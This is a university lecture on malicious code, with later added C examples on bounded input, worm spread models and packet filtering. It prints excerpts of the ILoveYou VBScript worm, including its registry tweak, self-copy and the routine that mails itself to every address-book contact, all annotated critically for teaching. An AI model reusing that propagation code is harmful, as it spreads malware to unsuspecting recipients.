Lecture 20: Malicious Code David Evans CS588: Cryptography

Lecture 20:
Malicious Code
CS588: Cryptography
University of Virginia
Computer Science
David Evans
http://www.cs.virginia.edu/evans
Menu
• Examination of ILoveYou Code
• Malicious Code Taxonomy
• Malcode Defenses Overview
– Virus Scanners
21 April 2005
University of Virginia CS 588
2
LoveLetter.VBS
• This 328-line program caused ~$10B in
damage
• How much work and smarts was
required?
Main Loop
    rem barok -loveletter(vbe) <i hate go to school>
    rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
    On Error Resume Next
    ...
    wscr.RegWrite "...Scripting Host\Settings\Timeout", 0
    sub main()
    ...
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    ...
    spreadtoemail()
    ...
    end sub
Slide annotations:
– Smart people would convey a more interesting message.
– Smart virus writers don’t include their contact information.
– This was smart – turn off the scripting timeout in the registry. (Dumb for Microsoft.)
spreadtoemail (edited to fit)
    sub spreadtoemail()
      for ctrlists=1 to mapi.AddressLists.Count
        set a=mapi.AddressLists(ctrlists)
        x=1
        for ctrentries=1 to a.AddressEntries.Count
          malead=a.AddressEntries(x)
          set male=out.CreateItem(0)
          male.Recipients.Add(malead)
          male.Subject = "ILOVEYOU"
          male.Body = "kindly check the attached LOVELETTER coming from me."
          male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
          male.Send
          x=x+1
        next
      next
    end sub
Slide annotations:
– Smart virus writers can spell “mail”.
– Smart virus writers understand for loops.
Be Very Afraid...
• When really dumb people with no
resources write malicious programs, it
costs $10B.
• What would happen if smart people with
resources wrote a malicious program?
– Paper link: Staniford, Paxson & Weaver,
How to 0wn the Internet in Your Spare
Time (2002)
• “Warhol worm”: 15 minutes to 0wn Internet
Attacking Malicious Code
• “Malicious Code” is a bad name
– Code has no intent
– Programmer’s intent doesn’t matter, what
the code does matters
• As networks get more programmable,
accidentally harmful code will become common
• We’ll use “malcode” (mal = bad)
– It’s not a great name either...
Taxonomy of Code
[Tree on the slide]
All Code
– Harmless Code (occasionally programs are actually useful, too)
– Malcode
  – Created by Malicious Author
  – Accidental
Taxonomy of Malcode
[Stallings, p. 502]
[Tree on the slide]
Malcode
– Requires Host Program: Trap Doors, Logic Bombs, Trojan Horses, Viruses
– Independent: Insiders, Worms
(Viruses and Worms form the Self-Replicating branch)
Worms and Viruses
• People get into stupid arguments over
whether something is a “worm” or a “virus”
– Is the Internet a host program?
• See Mark W. Eichin and Jon A. Rochlis, With
Microscope and Tweezers: An Analysis of the
Internet Virus of November 1988
• Is Outlook a host program for an email?
• Similarly, for worms/viruses/Trojans
– If the user must open it (e.g., ILoveYou), is it self-replicating?
Trojan Horses
• Greeks and Trojans at war
– Eris (Discord), Paris, Aphrodite, Helen
• Greeks attacking Troy, bombarded city for 10
years, but couldn’t get through city walls.
• Pretended to leave, left big wooden horse as gift
• Trojans brought horse into city (had to tear down
part of wall to do this), got silly drunk celebrating
victory.
• Greeks jumped out, killed sentries, and let in
Greek army.
Modern Trojan Horses
• User runs program that looks harmless
– Program pretends to be “cool, dancing bears”, also
erases your hard drive
• Most attacks today are Trojan Horses
– ILoveYou, Melissa, recent Microsoft attack, etc.
• Rely on modern humans being as dumb as
mythical Trojans
– No matter how good your city/fire walls are,
they don’t do any good if you can’t stop
users from running random code
Differences between Morris Worm 1988 and Melissa/ILoveYou 1999
Vulnerabilities Exploited
• Morris Worm:
– Buffer overflow: fingerd uses gets
– sendmail debug mode
– Weak Unix passwords
• Melissa:
– Word enables macros by default, no limitations on
macro behavior
• ILoveYou:
– Dumb people will run code attached to email
• Code Red/Nimda:
– Buffer overflow in IIS
Buffer Overflows
    int i;
    int k;
    char s[64];
    ...
    gets (s);
[Stack diagram on the slide: locals (i, k, ..., s[64]) | Frame Pointer | Return Address]
Input more than 64 bits: gets just writes down the stack
– bit 65: address of bit 66 on stack
– bits 66-...: instructions
Preventing Buffer Overflows
• Use run-time checks on all memory references
– Safe languages (CLU, Java, Eiffel, etc.)
– Safe libraries for C (don’t use gets, strcpy, etc.)
• Obfuscation
– Randomize locations in memory
• Separate code and data segments
– Make code segment unwritable (once application is loaded), only allow jumps in code segment
• Static analysis
– Check binary or source code
• But – about ½ of recent vulnerabilities are still
buffer overflows!
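An added example (not from the lecture) of the “safe libraries for C” bullet: bounded replacements for the slide’s gets/strcpy pattern that reject input longer than the 64-byte s buffer instead of running past it. The function names and the constructed inputs are mine.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 64   /* same size as the slide's char s[64] */

/* Safe-library replacement for the slide's gets/strcpy pattern: refuse
 * input that does not fit rather than silently truncating it. Returns 0 on
 * success, -1 on rejection, and leaves dst untouched when rejecting. */
int copy_bounded(char *dst, size_t cap, const char *input) {
    const char *end = memchr(input, '\0', cap);  /* scan at most cap bytes */
    if (end == NULL) return -1;                   /* no room for the NUL */
    memcpy(dst, input, (size_t)(end - input) + 1);
    return 0;
}

/* Bounded line read: fgets stops after cap-1 bytes, so a missing newline
 * means the line was longer than the buffer. Drain the rest of that line
 * and reject it (-2) so the next read starts on a fresh line. Returns 0 on
 * a complete line, -1 at end of input. */
int read_line_bounded(FILE *in, char *dst, size_t cap) {
    if (fgets(dst, (int)cap, in) == NULL) return -1;
    char *nl = strchr(dst, '\n');
    if (nl != NULL) { *nl = '\0'; return 0; }
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n') { }
    dst[0] = '\0';
    return -2;
}

/* Harness: copy a constructed line of n 'A's into a 64-byte buffer like the
 * slide's s[64]; returns the length stored, or -1 if it was rejected. */
int try_copy(size_t n) {
    char input[512], s[NAME_LEN];
    if (n >= sizeof input) return -1;
    memset(input, 'A', n); input[n] = '\0';
    int rc = copy_bounded(s, sizeof s, input);
    return rc == 0 ? (int)strlen(s) : rc;
}

/* Harness: the same constructed line plus a second line "next", read with
 * fgets from a temporary file; returns the length read or the rejection code. */
int try_read(size_t n) {
    char s[NAME_LEN];
    FILE *f = tmpfile();
    if (f == NULL) return -3;
    for (size_t i = 0; i < n; i++) fputc('A', f);
    fputs("\nnext\n", f); rewind(f);
    int rc = read_line_bounded(f, s, sizeof s);
    fclose(f);
    return rc == 0 ? (int)strlen(s) : rc;
}
```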
Replication Strategy
• Morris Worm
– Searched .forward files (should have used
.rhosts) to find other hosts to attack
– Used password guessing to break into
other accounts
– Used fingerd, sendmail vulnerabilities
• Melissa/ILoveYou
– Emails itself to entries in victim’s Outlook
address book
Damage
• Morris Worm
– Infected ~6000 computers (10% of Internet)
• Melissa
– Infected 1.2 Million machines in a few hours
• ILoveYou
– $10 Billion in damage
• Theorized worst case worm
– ~$50B (Nicholas Weaver and Vern Paxson, A
Worst-Case Worm, WEIS 2004)
Outcomes
• Internet Worm (Robert Morris, Jr.)
– 3 years suspended sentence (no jail time),
$10,000 fine.
– Current occupation
• Melissa (David Smith) (~$80m damages)
– Pleaded guilty, Dec 1999 (second successful prosecution of a virus author); link to plea agreement on manifest
– Hired by Rutgers as Computer Technician while
awaiting sentencing
• ILoveYou ($10B damages)
– Released without penalty; no laws in the Philippines
Responses
• Morris Worm
– Disconnect from network
– Disorganized, phone
• Anonymous message (probably from Robert Morris) explaining how to disable the virus was not noticed or distributed
– DARPA established CERT
• Melissa
– CERT Advisory, Eradicated quickly
• But CERT had to rebuild Web server
• ILoveYou
– Many countries have since passed laws, Europe treaty
announced last week
Malcode Defenses
1. Prevent malcode from running
2. Limit damage it can do
3. Discourage attackers
Malcode Defenses
1. Prevent malcode from running
   – Virus scanners – recognize known malcode
   – Firewalls – drop incoming packets
   – Code signing (only run code from trusted sources)
   – Education – make users smarter
2. Limit damage it can do
   – Sandbox (“Playpen”) – run malcode in protected virtual machine
   – Reference monitors – enforce policy on execution
   – Intrusion Detection, System maintenance
3. Discourage attackers
   – Legal – pass laws to penalize attackers
Today: virus scanners. Tuesday: firewalls, reference monitors, intrusion detection.
Virus Scanners
Virus Scanners
• Compare code to a database of known
malicious code
– Smart authors create self-mutating viruses
– Smart virus scanners try to deal with this (but
usually fail)
• Reasonably useful in days of “sneaker”
net (viruses spread on floppies)
• Reasonably useless when viruses spread
as fast as email
Virus Spreading
• Read email every hour
• Everyone’s address book contains 50 people
• Infects 300M people in 6 hours!
[Chart on the slide: people infected, 0 to 350,000,000, against hours 1 to 6]
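The chart’s growth curve, reconstructed as an added example (mine, not the lecture’s): the slide’s own model, in which every address-book entry is a new victim, beside a variant I add as an assumption in which address books overlap at random. POPULATION, FANOUT and the function names are mine.

```c
#define POPULATION 300000000.0   /* slide: "infects 300M people" */
#define FANOUT 50                /* slide: 50 people per address book */
#define MAX_HOURS 24

/* base^k by repeated squaring; avoids pow() and a libm dependency. */
static double pow_int(double base, unsigned long long k) {
    double r = 1.0;
    while (k) { if (k & 1) r *= base; base *= base; k >>= 1; }
    return r;
}

/* The slide's model: every address-book entry is a fresh victim, so after
 * t hourly mail checks 50^t people are infected, capped at the population. */
double naive_spread(int hours, double *out) {
    double infected = 1.0;
    for (int t = 0; t < hours; t++) {
        infected *= FANOUT;
        if (infected > POPULATION) infected = POPULATION;
        out[t] = infected;
    }
    return infected;
}

/* Added refinement (my assumption, not the lecture's): address-book entries
 * are drawn uniformly from the population, so later rounds mostly reach
 * people who are already infected. With I senders infected in the previous
 * hour and S still susceptible, expected fresh infections = S*(1-(1-1/N)^(50 I)). */
double mixing_spread(int hours, double *out) {
    double susceptible = POPULATION - 1.0, fresh = 1.0;
    for (int t = 0; t < hours; t++) {
        double p_miss = pow_int(1.0 - 1.0 / POPULATION, (unsigned long long)(FANOUT * fresh));
        fresh = (double)(long long)(susceptible * (1.0 - p_miss) + 0.5);  /* round */
        susceptible -= fresh;
        out[t] = POPULATION - susceptible;
    }
    return POPULATION - susceptible;
}

/* Cumulative infections after the given hour (1-based) under a model. */
double infected_after(int hour, double (*model)(int, double *)) {
    double hist[MAX_HOURS];
    model(MAX_HOURS, hist);
    return hist[hour - 1];
}

/* First hour at which the model reaches a fraction of the population, or -1. */
int hours_to_infect(double fraction, double (*model)(int, double *)) {
    for (int h = 1; h <= MAX_HOURS; h++)
        if (infected_after(h, model) >= fraction * POPULATION) return h;
    return -1;
}
```

Under both models the whole population is reached within the slide’s six hours; the overlap model only delays saturation by about one hour.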
Code Red
What Virus Scanner Peddlers Do
(2001)
http://security.norton.com/
First, it tells you to lower your security settings to allow ActiveX.
Always Click “Yes”
“During the download, you might see one or more messages asking if it is OK to download and run these programs. Click Yes when these messages appear.”
What Virus Scanner Peddlers Do
(Today)
What it Should Do
• Tell people who have ActiveX turned off,
“Good Job”
• Tell people who click “OK” to run their
scanner (which accesses every byte on
their disk) without checking its certificate
that they are very vulnerable and
should get an education!
Malcode Defenses
1. Prevent malcode from running
   – Virus scanners – recognize known malcode
   – Firewalls – drop incoming packets
   – Code signing (only run code from trusted sources)
   – Education – make users smarter
2. Limit damage it can do
   – Sandbox (“Playpen”) – run malcode in protected virtual machine
   – Reference monitors – enforce policy on execution
   – Intrusion Detection, System maintenance
3. Discourage attackers
   – Legal – pass laws to penalize attackers
The Best Firewall
[Diagram on the slide: a machine with no link to the network and no power]
Functionality is Bad
Lesser Firewall
[Diagram on the slide: the firewall sits between the machine and its link to the network]
    firewall (p: packet) {
        if (allow (p)) forward (p);
        else drop (p);
    }
Networks – OSI Model
[Layer diagram on the slide]
    Application / Presentation / Session: FTP, SMTP, HTTP, RealPlayer, ...
    Transport: TCP, UDP
    Network: IP
    Data Link / Physical: Ethernet, FDDI, CDMA, Smoke Signals, Other
An IP (V4) Packet
[Header layout on the slide, with bit offsets marked 0, 16, 32, 48, 64, 80, 96, 128, 160; fields in order:]
    IP Version (4)
    IP Header Length
    Type of Service (not used)
    Size of Datagram
    Packet Identification
    Flags
    Fragment Offset
    TTL
    Transport Protocol (e.g., TCP)
    Header Checksum
    Source IP Address
    Destination IP Address
    Options
    Data
A Simple Packet Filter
    boolean allow (packet) {
        if (match (packet.source, "18.26.4.*"))
            return false;   // No packets from Robert Morris' machines.
        else if (match (packet.source, "149.150.209.*"))
            return false;   // Cheaton Hall
        else
            return true;
    }
Typical Packet Filtering Rules
Incoming:
    permit 0.0.0.0 128.143.137.19   TCP src >= 1024  dst = 25
    permit 0.0.0.0 128.143.137.19   TCP src = 25     dst >= 1024
Outgoing:
    permit 128.143.137.19 0.0.0.0   TCP src = 25     dst >= 1024
    permit 128.143.137.19 0.0.0.0   TCP src >= 1024  dst = 25
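An added example (not from the lecture) that fills in the allow() of the Lesser Firewall pseudocode for both the Simple Packet Filter and the rule table above: address patterns in the slides’ notation, first-match permit rules with default deny, and the four mail-host rules as data. The struct and function names are mine.

```c
#include <string.h>

/* Constructed packet summary (the fields the slides' rules look at) and a
 * permit rule with port ranges: ">= 1024" is 1024..65535, "= 25" is 25..25. */
typedef struct { const char *src, *dst, *proto; int sport, dport; } packet_t;
typedef struct {
    const char *src, *dst, *proto;
    int sport_min, sport_max, dport_min, dport_max;
} rule_t;

/* Address patterns as written on the slides: "0.0.0.0" means any host,
 * "18.26.4.*" means the whole 18.26.4 network, anything else must match
 * exactly. The trailing dot in the prefix keeps 18.26.40.x out. */
int match_addr(const char *pattern, const char *addr) {
    size_t n = strlen(pattern);
    if (strcmp(pattern, "0.0.0.0") == 0) return 1;
    if (n > 0 && pattern[n - 1] == '*') return strncmp(pattern, addr, n - 1) == 0;
    return strcmp(pattern, addr) == 0;
}

/* allow() for the "Lesser Firewall" loop: the first matching permit rule
 * wins, and a packet that matches no rule is dropped (default deny). */
int allow(const rule_t *rules, int nrules, const packet_t *p) {
    for (int i = 0; i < nrules; i++) {
        const rule_t *r = &rules[i];
        if (match_addr(r->src, p->src) && match_addr(r->dst, p->dst)
            && strcmp(r->proto, p->proto) == 0
            && p->sport >= r->sport_min && p->sport <= r->sport_max
            && p->dport >= r->dport_min && p->dport <= r->dport_max)
            return 1;
    }
    return 0;
}

/* The slide's "Typical Packet Filtering Rules" for mail host 128.143.137.19.
 * Caveat: the second rule admits any outside packet whose source port is
 * 25 to any high port, because a stateless filter cannot tell a genuine
 * SMTP reply from a packet that merely claims to be one. */
static const rule_t MAIL_RULES[] = {
    {"0.0.0.0", "128.143.137.19", "TCP", 1024, 65535, 25, 25},
    {"0.0.0.0", "128.143.137.19", "TCP", 25, 25, 1024, 65535},
    {"128.143.137.19", "0.0.0.0", "TCP", 25, 25, 1024, 65535},
    {"128.143.137.19", "0.0.0.0", "TCP", 1024, 65535, 25, 25},
};

/* One-call check of a packet against the mail-host rule set. */
int check_mail(const char *src, const char *dst, const char *proto,
               int sport, int dport) {
    packet_t p = {src, dst, proto, sport, dport};
    return allow(MAIL_RULES, (int)(sizeof MAIL_RULES / sizeof MAIL_RULES[0]), &p);
}
```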
Packet Filter Layers
[Same layer diagram as the OSI slide; the packet filter rules above inspect only IP addresses and TCP ports, i.e., the Network and Transport layers]
    Application / Presentation / Session: FTP, SMTP, HTTP, RealPlayer, ...
    Transport: TCP, UDP
    Network: IP
    Data Link / Physical: Ethernet, FDDI, CDMA, Smoke Signals, Other
Application-Layer Gateways
• Analyze communication at application
layer
• All communication must go through a
proxy that knows about application
• Able to detect application-level attacks
• Poor scalability, performance
• Fail-safe is annoying
Malcode on the Near Horizon
• Cell Phones
– Billions of them worldwide, becoming as complex as
computers were in 1988
– About 60% run Symbian OS
• Cabir (November 2004) – spread using Bluetooth
(short range networking) on Symbian OS (but
required user agreement)
• CommWarrior (March 2005) – spread using phone
network (multimedia messages), contact list
• Today: spread limited – only 2% of phones are
“smartphones” (this will change soon!)
Malcode Summary
• Best defense is education
• Next best defense is a good offense
– Tough legal penalties for convicted attackers
– Doesn’t work against motivated foreign
governments
• Some Technical Defenses
– Virus Scanners
– Tuesday:
• Reference Monitors, Proof-Carrying Code
• Firewalls, Intrusion Detection
Charge
• Project Presentations will be final class: Tuesday,
May 3
• Normal project expectation:
– Your team will make a presentation on May 3 (up to 15 minutes, can be as short as 5)
– You will hand in a paper report on May 3
– You will put up a web page (that could just be the same
as your paper report)
• Take home final out May 3, due May 7
– Some public-key cryptosystems questions
– Something involving hash chains
– One essay question (security analysis)